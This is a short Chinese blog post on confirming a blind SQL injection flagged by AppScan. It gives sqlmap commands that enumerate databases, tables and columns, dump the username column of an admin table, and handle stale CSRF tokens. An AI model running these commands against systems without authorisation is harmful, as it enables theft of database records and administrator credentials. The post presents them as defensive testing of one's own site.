做安全测试时,先用appscan扫描目标网站,爆出sql盲注的风险
然后使用sqlmap专业工具来扫描分析漏洞
GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolAutomatic SQL injection and database takeover tool - GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
https://github.com/sqlmapproject/sqlmap把上图所示部分(请求行+请求头+请求体)存储为test.txt,放到与sqlmap.py同路径下
- 查看所有数据库
python sqlmap.py -r E:\sqlmap-master\test.txt --dbs
# 更多的case
python sqlmap.py -r E:\sqlmap-master\test.txt --risk 3 --level 5 --dbs 
结果中有parameter说明确实有漏洞
所有数据库信息
- 查看指定数据库的所有表信息
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn --tables 
- 查看指定数据库,表的所有列信息
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin --columns 
- 查看指定数据库,表,列的信息
python sqlmap.py -r E:\sqlmap-master\test.txt --batch -D my_svn -T s_admin -C username --dump 
太可怕了,数据库数据暴漏了,网络安全人人有责!
自查
- anti-CSRF token 'XSRF-TOKEN' can't be found at
说明cookie过期了,把txt文件cookie更新为最新的
- Cookie parameter 'XSRF-TOKEN' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
选n
- all tested parameters do not appear to be injectable.
说明该接口通过了sql的注入测试
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
